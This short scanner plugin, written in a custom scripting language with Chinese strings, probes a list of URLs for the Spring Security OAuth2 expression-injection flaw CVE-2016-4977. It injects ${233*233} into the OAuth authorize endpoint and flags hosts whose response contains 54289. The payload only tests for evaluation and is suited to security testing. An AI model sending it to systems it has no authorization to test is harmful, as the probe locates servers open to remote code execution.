#request urls = array
#define payload =/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test
#define bug = 54289
#define info = 存在Spring Security OAuth2 远程命令执行漏洞（CVE-2016-4977）

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
